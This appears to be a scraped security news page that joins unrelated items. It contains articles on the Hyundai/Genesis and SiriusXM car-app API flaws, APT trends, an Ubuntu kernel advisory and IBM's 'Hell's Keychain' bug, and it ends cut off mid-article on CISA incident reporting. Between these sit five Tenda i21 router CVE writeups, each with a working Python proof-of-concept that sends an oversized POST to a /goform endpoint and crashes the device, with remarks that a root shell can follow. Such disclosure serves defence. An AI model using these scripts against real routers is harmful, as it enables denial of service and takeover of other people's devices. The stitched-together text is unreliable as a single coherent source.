A trio of security bugs allow remote attackers to unlock or start the car, operate climate controls, pop the trunk, and more — all via poorly coded mobile apps.

At least three mobile apps tailored to allow drivers to remotely start or unlock their vehicles were found to have security vulnerabilities that could allow unauthenticated malicious types to do the same from afar. Researchers say securing APIs for these types of powerful apps is the next phase in preventing connected car hacking.

According to Yuga Labs, car-specific apps from Hyundai and Genesis, as well as the SiriusXM smart vehicle platform (used by various automakers, including Acura, Honda, Nissan, Toyota and others), could have allowed attackers to intercept traffic between the apps and vehicles made after 2012.

**Hyundai Apps Allow Remote Car Control**

When it comes to the MyHyundai and MyGenesis apps, an investigation of the API calls that the apps make showed that owner validation is done through matching up the driver's email address with various registration parameters. After playing around with potential ways to subvert this "pre-flight check," as the researchers called it, they discovered an avenue of attack:

"By adding a CRLF character at the end of an already existing victim email address during registration, we could create an account which bypassed the ... email parameter comparison check," they explained in a series of tweets detailing the weaknesses. From there, they were able to gain complete control over the apps' commands — and over the car. In addition to starting the car, attackers could set the horn off, control the AC, and pop the trunk, among other things.

They were also able to automate the attack. "We took all of the requests necessary to exploit this and put it into a python script which only needed the victim's email address," they tweeted. "After inputting this, you could then execute all commands on the vehicle and takeover the actual account."

"Many car hacking scenarios are the result of an API security issue, not an issue with the mobile app itself," Scott Gerlach, co-founder and CSO at StackHawk, says. "All of the sensitive data and functions of a mobile app reside in the API an app talks to, so that's what needs to be secure. The upside is this is a very targeted type of attack and would be difficult to mass execute. The downside is it's still highly invasive for the targeted car owner."

The finding showcases the criticality of API security testing, Gerlach says.

"Testing APIs for OWASPs Top 10 vulnerabilities including Insecure Direct Object Access and Broken Function Authorization is no longer a nice-to-have step in the software development lifecycle," he notes. "In the way connected cars are sold today ... is similar to a customer opening a bank account and then being tasked to create their online access based on the account number alone. Anyone could find that data with little effort and put your assets at risk because the verification process was not thought through."

**SiriusXM-Based Car Hacking**

While most people know SiriusXM as a satellite radio juggernaut, the company is also a connected vehicle telemetry provider, providing 12 million connected cars with functions like remote start, GPS location, remote climate controls, and more. A wide range of automakers, including Acura, BMW, Honda, Hyundai, Infiniti, Jaguar, Land Rover, Lexus, Nissan, Subaru, and Toyota, all use the SiriusXM connected car platform, according to its website.

The Yuga researchers examined one of the mobile apps that SiriusXM powers, the NissanConnect app, and found that if they knew a target's vehicle identification number (VIN, which is visible through most cars' front windshields), they could send forged HTTP requests to the endpoint and get back a host of information, including a driver's name, phone number, address, and vehicle details that could be used to execute remote commands on the car through the app.

From there, they built another automated script. "We made a simple Python script to fetch the customer details of any VIN number," they said in a tweet thread.

"This latest vulnerability isn’t about embedded systems or the manufacturing, but rather the web application itself," Connor Ivens, competitive intelligence manager for security at Tanium, tells Dark Reading. "Researchers are using the car VIN numbers as the primary key of customer ID, and sending POST requests to generate a bearer token. This allows you administrative control to issue other requests over the car."

It's clear that mobile app security needs to be hardened. "The app service itself is almost an afterthought of the purchase process," Gerlach says. "Car manufacturers need to think more deeply about how to better integrate the connected service into the purchase and validation process for the customer."

**Expect to Crash Into Car Security Vulnerabilities**

Yuga disclosed the flaws to both Hyundai and SiriusXM, which promptly issued patches. No real-world attacks occurred, but researchers tell Dark Reading that these kinds of bug discoveries will continue to come to the fore, especially as vehicles become more connected, and the complexity of onboard software and remote capabilities goes up.

While connected and autonomous vehicles have an expanded attack surface similar to enterprise environments, impacted consumers don’t have an entire cybersecurity team working for them, says Karen Walsh, cybersecurity compliance expert and CEO at Allegro Solutions. Thus, the onus is on carmakers to do better.

"Whether the industry likes it or not, it’s going to need to work harder to secure this attack vector. This will also place a much larger burden on the industry from a supply chain standpoint. It’s not just the vehicles that need to be secured, but all the additional technologies — in this case infotainment like SiriusXM — that need to be included in any security initiative."

**Evolving Past the Jeep Hacking Demo**

We may see an uptick in probing for such flaws as well. Since the infamous 2015/2016 Jeep hacking demos from Charlie Miller and Chris Valasek at Black Hat USA brought potential physical vulnerabilities in connected cars to light, the field of automotive hacking has exploded.

"The Jeep hacking demo involved hacking over cellular modems (and cell companies disabled some key functionality as a result)," says John Bambenek, principal threat hunter at Netenrich. "Web apps have their own security concerns distinct from that path of communication. I don't have to own the entire communication stack, I just need to find a soft spot and researchers continue to find them. The reality is that it's all put together with defective duct tape and bailing wire ... it always has been."

Mike Parkin, senior technical engineer at Vulcan Cyber, says that mobile is the next frontier.

"It was challenging enough when threat actors were just attacking key fobs with remote range and limited capability," he tells Dark Reading. "Now, with cars being as much a mobile computing platform as a vehicle, it will only get more challenging."

He adds, "If an attacker can compromise a mobile device, they could potentially control many of the applications on it including a user’s vehicle control app. The control channels between a user's mobile device, the manufacturer’s cloud services, and the vehicle itself are another attack surface threat actors could leverage."

SiriusXM, MyHyundai Car Apps Showcase Next-Gen Car Hacking

Following a year of increasingly disruptive attacks, advanced persistent threat groups will likely only become emboldened in 2023, security experts say.

In November, Ukraine's president revealed that the country's IT defenses fended off more than 1,300 Russian cyberattacks, including attacks on satellite communications infrastructure.

The onslaught of cyberattacks highlights one of the shifts in advanced persistent threat (APT) attacks seen in the past year: In 2022, geopolitical tensions ratcheted up, and along with them, cyber operations became the go-to strategy for national governments. While Russia and other nations have used cyberattacks to support military actions in the past, the ongoing war represents the most sustained cyber operation to date and one that will undoubtedly continue in the coming year, experts say.

Military conflict will join cybercrime as a driving force behind APT groups in the coming year, John Lambert, corporate vice president and distinguished engineer at Microsoft's Threat Intelligence Center, stated in the company's Digital Defense Report 2022 released last month.

"The conflict in Ukraine has provided an all-too-poignant example of how cyberattacks evolve to impact the world in parallel with military conflict on the ground," he said. "Power systems, telecommunication systems, media, and other critical infrastructure all became targets of both physical attacks and cyberattacks."

While the increased use of APT attacks by Russia is the most visible change that occurred in the past year, APTs are evolving. More are moving onto critical infrastructure, adopting dual-use tools and living-off-the-land techniques, and pinpointing the software supply chain to gain access to targeted companies.

Cybercriminals are using increasingly sophisticated tools, but APT techniques are typically attributed to nation-state operations, meaning that companies need to become more aware of the techniques used by advanced actors and how they may be motivated by geopolitical concerns, says Adam Meyers, senior vice president of intelligence for cybersecurity services firm CrowdStrike.

"You don't have one uniform threat — it changes by business vertical and geo-location," he says. "You — and this has been our mantra for many years — don't have a malware problem, you have an adversary problem, and if you think about who those adversaries are, what they are after, and how they operate, then you will be in a much better position to defend against them."

**Critical Infrastructure, Satellites Increasingly Targeted**

In 2021, the attack on oil-and-gas distributor Colonial Pipeline highlighted the impact that cybersecurity weakness could have on the US economy. Similarly, this year's attack on the Viasat satellite communication system — likely by Russia — showed that APT threat actors have continued to focus on disrupting critical infrastructure through cyberattacks. The trend has gained momentum over the past year, with Microsoft warning that the number of nation-state notifications (NSNs) the company issued as alerts to customers more than doubled, with 40% of the attacks targeting critical infrastructure, compared to 20% in the prior year.

Critical infrastructure is not just a target of nation-state actors. Cybercriminals focused on ransomware are also targeting critical infrastructure companies, as well as pursuing a hack-and-leak strategy, Kaspersky stated in its recently published APT predictions.

"We believe that in 2023 we will see a record number of disruptive and destructive cyberattacks, affecting government, industry, and critical civilian infrastructure — perhaps energy grids or public broadcasting, for instance," says David Emm, principal security researcher at Kaspersky. "This year, it became clear just how vulnerable physical infrastructure can be, so it's possible we might see targeting of underwater cables and fibre distribution hubs."

**Not Just Cobalt Strike**

Cobalt Strike has become a popular tool among APT groups, because it provides attackers — and when used for its legitimate purposes, red teams and penetration testers — post-exploitation capabilities, covert communications channels, and the ability to collaborate. The red-team tool has "crop\[ped\] up in a myriad of campaigns from state-sponsored APTs to politically motivated threat groups," says Leandro Velasco, a security researcher with cybersecurity firm Trellix.

Yet, as defenders have increasingly focused on detecting both Cobalt Strike and the popular Metasploit Framework, threat actors have moved toward alternatives, including the commercial attack simulation tool Brute Ratel C4 and the open source tool Sliver.

"Brute Ratel C4 ... is especially dangerous since it has been designed to avoid detection by antivirus and EDR protection," Kaspersky's Emm says. Other up-and-coming tools include Manjusaka, which has implants written in Rust for both Windows and Linux, and Ninja, a remote exploitation and control package for post exploitation, he says.

**Identity Under Attack**

Following the coronavirus pandemic, remote work — and the cloud services to support such work — have increased in importance, leading attackers to target those services with identity attacks. Microsoft, for example, saw 921 attacks every second, a 74% increase in volume over the past year, the company stated in its report.

In fact, identity has become a critical component to securing the infrastructure and enterprise, while at the same time becoming a major target of APT groups. Every breach and compromise investigated by CrowdStrike in the past year has had an identity component, CrowdStrike's Meyers says.

"We used to say trust, but verify, but the new mantra is verify and then trust," he says. "These attackers have started targeting that soft underbelly of identity ... that is a complex part of the system."

**IT Supply Chains Under Attack**

The attack on SolarWinds and the widely exploited vulnerability in Log4J2 demonstrated the opportunities that vulnerabilities in the software supply offer to attackers, and companies should expect APT groups to create their own vulnerabilities through attacks on the software supply chain.

While there has been no major event yet, attackers have targeted Python ecosystems with dependency confusion attacks against open source repositories and phishing attacks targeting Python developers. Overall, the number of attacks targeting developers and companies increased by more than 650% over the past year.

In addition, APT actors are finding the weak points in vendor and supplier relationships and exploiting them. In January, for example, the Iran-linked DEV-0198 group compromised an Israeli cloud provider by using a compromised credential from a third-party logistics company, according to Microsoft's report.

"This past year of activity demonstrates that threat actors ... are getting to know the landscape of an organization's trusted relationships better than the organizations themselves," the report stated. "This increased threat emphasizes the need for organizations to understand and harden the borders and entry points of their digital estates."

To harden their defenses against APT groups and advanced attacks, companies should regularly verify their cybersecurity hygiene, develop and deploy incident response strategies, and integrate actionable threat intelligence feeds into their processes, says Trellix's Velasco. To make identity attacks more difficult, multifactor authentication should be routine, he says.

"In 2023, simple security planning is not enough to deter or prevent attackers," Velasco says. "System defenders need to implement a more proactive defensive approach."

Where Advanced Cyberttackers Are Heading Next: Disruptive Hits, New Tech

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setUplinkInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setUplinkInfo, pingHostIp1 is controlled by the user and will be spliced into auto\_ping\_ip by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'upLinkEn=true&pingHostIp1=' + p1

p3 \= b"POST /goform/setUplinkInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44367: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setDiagnoseInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Heap overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setDiagnoseInfo, a value of 0x50 is created, which will use strcpy to give the value after cmd + 5 to the heap. It is worth noting that the size is not checked, resulting in a heap overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'cmd=' + p1

p3 \= b"POST /goform/setDiagnoseInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash

CVE-2022-44366: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) has a stack overflow vulnerability via /goform/setSysPwd.

Permalink

Cannot retrieve contributors at this time

**Tenda i21 V1.0.0.14(4656) Dos vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setSysPwd, when action is set to admin, the value of oldPwd will be base64 encoded and then passed to v3, and then v3 will be sent to encode\_pwd by strcpy. It is worth noting that the stack overflow vulnerability is caused by not checking the size.

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'action=admin&oldPwd=' + p1

p3 \= b"POST /goform/setSysPwd" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash

CVE-2022-44365: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/setSnmpInfo.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/setSnmpInfo, snmpEn is controlled by the user and will finally be spliced into parm by sprintf. It is worth noting that the stack overflow is caused by not checking the size

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'snmpEn=' + p1

p3 \= b"POST /goform/setSnmpInfo" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44363: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Tenda i21 V1.0.0.14(4656) is vulnerable to Buffer Overflow via /goform/AddSysLogRule.

Permalink

**Tenda i21 V1.0.0.14(4656) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address:https://www.tenda.com.cn/download/detail-2982.html
    

**Affected version**

**Vulnerability details**

In /goform/AddSysLogRule, when the input op is add, you can input logip, logport, len, and finally these three will be spliced into mib\_value through sprintf. It is worth noting that these three do not check the size, resulting in stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'op=add&logip=' + p1

p3 \= b"POST /goform/AddSysLogRule" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44362: CVE-vulns/readme.md at main · Double-q1015/CVE-vulns

Ubuntu Security Notice 5755-1 - It was discovered that the NFSD implementation in the Linux kernel did not properly handle some RPC messages, leading to a buffer overflow. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5755-1December 01, 2022linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gkeop, linux-hwe-5.15,linux-ibm, linux-intel-iotg, linux-kvm, linux-lowlatency,linux-lowlatency-hwe-5.15, linux-oracle, linux-oracle-5.15, linux-raspivulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-lowlatency-hwe-5.15: Linux low latency kernel- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:It was discovered that the NFSD implementation in the Linux kernel did notproperly handle some RPC messages, leading to a buffer overflow. A remoteattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2022-43945)Jann Horn discovered that the Linux kernel did not properly track memoryallocations for anonymous VMA mappings in some situations, leading topotential data structure reuse. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2022-42703)It was discovered that a memory leak existed in the IPv6 implementation ofthe Linux kernel. A local attacker could use this to cause a denial ofservice (memory exhaustion). (CVE-2022-3524)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2022-3564)It was discovered that the ISDN implementation of the Linux kernelcontained a use-after-free vulnerability. A privileged user could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2022-3565)It was discovered that the TCP implementation in the Linux kernel containeda data race condition. An attacker could possibly use this to causeundesired behaviors. (CVE-2022-3566)It was discovered that the IPv6 implementation in the Linux kernelcontained a data race condition. An attacker could possibly use this tocause undesired behaviors. (CVE-2022-3567)It was discovered that the Realtek RTL8152 USB Ethernet adapter driver inthe Linux kernel did not properly handle certain error conditions. A localattacker with physical access could plug in a specially crafted USB deviceto cause a denial of service (memory exhaustion). (CVE-2022-3594)It was discovered that a null pointer dereference existed in the NILFS2file system implementation in the Linux kernel. A local attacker could usethis to cause a denial of service (system crash). (CVE-2022-3621)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1011-gkeop   5.15.0-1011.15   linux-image-5.15.0-1021-ibm     5.15.0-1021.24   linux-image-5.15.0-1021-intel-iotg  5.15.0-1021.26   linux-image-5.15.0-1021-raspi   5.15.0-1021.23   linux-image-5.15.0-1021-raspi-nolpae  5.15.0-1021.23   linux-image-5.15.0-1024-kvm     5.15.0-1024.29   linux-image-5.15.0-1025-gcp     5.15.0-1025.32   linux-image-5.15.0-1025-oracle  5.15.0-1025.31   linux-image-5.15.0-1026-aws     5.15.0-1026.30   linux-image-5.15.0-56-generic   5.15.0-56.62   linux-image-5.15.0-56-generic-64k  5.15.0-56.62   linux-image-5.15.0-56-generic-lpae  5.15.0-56.62   linux-image-5.15.0-56-lowlatency  5.15.0-56.62   linux-image-5.15.0-56-lowlatency-64k  5.15.0-56.62   linux-image-aws                 5.15.0.1026.24   linux-image-aws-lts-22.04       5.15.0.1026.24   linux-image-gcp                 5.15.0.1025.20   linux-image-generic             5.15.0.56.54   linux-image-generic-64k         5.15.0.56.54   linux-image-generic-64k-hwe-22.04  5.15.0.56.54   linux-image-generic-hwe-22.04   5.15.0.56.54   linux-image-generic-lpae        5.15.0.56.54   linux-image-generic-lpae-hwe-22.04  5.15.0.56.54   linux-image-gkeop               5.15.0.1011.10   linux-image-gkeop-5.15          5.15.0.1011.10   linux-image-ibm                 5.15.0.1021.17   linux-image-intel-iotg          5.15.0.1021.20   linux-image-kvm                 5.15.0.1024.22   linux-image-lowlatency          5.15.0.56.49   linux-image-lowlatency-64k      5.15.0.56.49   linux-image-lowlatency-64k-hwe-22.04  5.15.0.56.49   linux-image-lowlatency-hwe-22.04  5.15.0.56.49   linux-image-oracle              5.15.0.1025.20   linux-image-raspi               5.15.0.1021.18   linux-image-raspi-nolpae        5.15.0.1021.18   linux-image-virtual             5.15.0.56.54   linux-image-virtual-hwe-22.04   5.15.0.56.54Ubuntu 20.04 LTS:   linux-image-5.15.0-1025-oracle  5.15.0-1025.31~20.04.2   linux-image-5.15.0-1026-aws     5.15.0-1026.30~20.04.2   linux-image-5.15.0-56-generic   5.15.0-56.62~20.04.1   linux-image-5.15.0-56-generic-64k  5.15.0-56.62~20.04.1   linux-image-5.15.0-56-generic-lpae  5.15.0-56.62~20.04.1   linux-image-5.15.0-56-lowlatency  5.15.0-56.62~20.04.1   linux-image-5.15.0-56-lowlatency-64k  5.15.0-56.62~20.04.1   linux-image-aws                 5.15.0.1026.30~20.04.16   linux-image-generic-64k-hwe-20.04  5.15.0.56.62~20.04.22   linux-image-generic-hwe-20.04   5.15.0.56.62~20.04.22   linux-image-generic-lpae-hwe-20.04  5.15.0.56.62~20.04.22   linux-image-lowlatency-64k-hwe-20.04  5.15.0.56.62~20.04.20   linux-image-lowlatency-hwe-20.04  5.15.0.56.62~20.04.20   linux-image-oracle              5.15.0.1025.31~20.04.1   linux-image-virtual-hwe-20.04   5.15.0.56.62~20.04.22After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5755-1   CVE-2022-3524, CVE-2022-3564, CVE-2022-3565, CVE-2022-3566,   CVE-2022-3567, CVE-2022-3594, CVE-2022-3621, CVE-2022-42703,   CVE-2022-43945Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-56.62   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1026.30   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1025.32   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1011.15   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1021.24   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1021.26   https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1024.29   https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-56.62   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1025.31   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1021.23   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1026.30~20.04.2   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-56.62~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-56.62~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1025.31~20.04.2

Ubuntu Security Notice USN-5755-1

IBM has fixed a high-severity security vulnerability affecting its Cloud Databases (ICD) for PostgreSQL product that could be potentially exploited to tamper with internal repositories and run unauthorized code.
The privilege escalation flaw (CVSS score: 8.8), dubbed "Hell's Keychain" by cloud security firm Wiz, has been described as a "first-of-its-kind supply-chain attack vector impacting a

Kubernetes / Cloud Security

IBM has fixed a high-severity security vulnerability affecting its Cloud Databases (ICD) for PostgreSQL product that could be potentially exploited to tamper with internal repositories and run unauthorized code.

The privilege escalation flaw (CVSS score: 8.8), dubbed "**Hell's Keychain**" by cloud security firm Wiz, has been described as a "first-of-its-kind supply-chain attack vector impacting a cloud provider's infrastructure."

Successful exploitation of the bug could enable a malicious actor to remotely execute code in customers' environments and even read or modify data stored in the PostgreSQL database.

"The vulnerability consists of a chain of three exposed secrets (Kubernetes service account token, private container registry password, CI/CD server credentials) coupled with overly permissive network access to internal build servers," Wiz researchers Ronen Shustin and Shir Tamari said.

Hell's Keychain commences with an SQL injection flaw in ICD that grants an attacker superuser (aka "ibm") privileges, which is then used to execute arbitrary commands on the underlying virtual machine hosting the database instance.

This capability is weaponized to access a Kubernetes API token file, allowing for broader post-exploitation efforts that involve pulling container images from IBM's private container registry, which stores images related to ICD for PostgreSQL, and scanning those images for additional secrets.

"Container images typically hold proprietary source code and binary artifacts that are the company's intellectual property," the researchers explained. "They can also contain information that an attacker could leverage to find additional vulnerabilities and perform lateral movement within the service's internal environment."

Wiz said it was able to extract internal artifact repository and FTP credentials from the image manifest files, effectively permitting unfettered read-write access to trusted repositories and IBM build servers.

An attack of this kind could have severe ramifications, as it enables the adversary to overwrite arbitrary files that are used in the build process of the PostgreSQL image, which would then be installed on every database instance.

The American technology giant, in an independent advisory, said that all IBM Cloud Databases for PostgreSQL instances were potentially impacted by the bug, but noted that it found no evidence of malicious activity.

It further stated that the fixes have been automatically applied to customer instances and that no further action is required. The mitigations were rolled out on August 22 and September 3, 2022.

"These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform," the researchers said.

To mitigate such threats, it's recommended that organizations monitor their cloud environments for scattered credentials, enforce network controls to prevent access to production servers, and safeguard against container registry scraping.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Disclose Supply-Chain Flaw Affecting IBM Cloud Databases for PostgreSQL

The new Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) requires CISA to create rules regarding cyber incident reporting by critical infrastructure organizations. The RFI and hearings precede a Notice of Proposed Rulemaking (NPRM) that CISA must publish sooner than 24 months from the enactment of CIRCIA, which the President signed into law in March. The sessions and

Incident Reporting / Password Policy

The new Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) requires CISA to create rules regarding cyber incident reporting by critical infrastructure organizations. The RFI and hearings precede a Notice of Proposed Rulemaking (NPRM) that CISA must publish sooner than 24 months from the enactment of CIRCIA, which the President signed into law in March. The sessions and NPRM are steps toward creating the new rule.

CISA is soliciting expert opinion on what to include in a report but is taking steps to implement the change soon. Here's what that change means for businesses in the US and what you can do about it now.

**Overview of the CISA reporting rule**

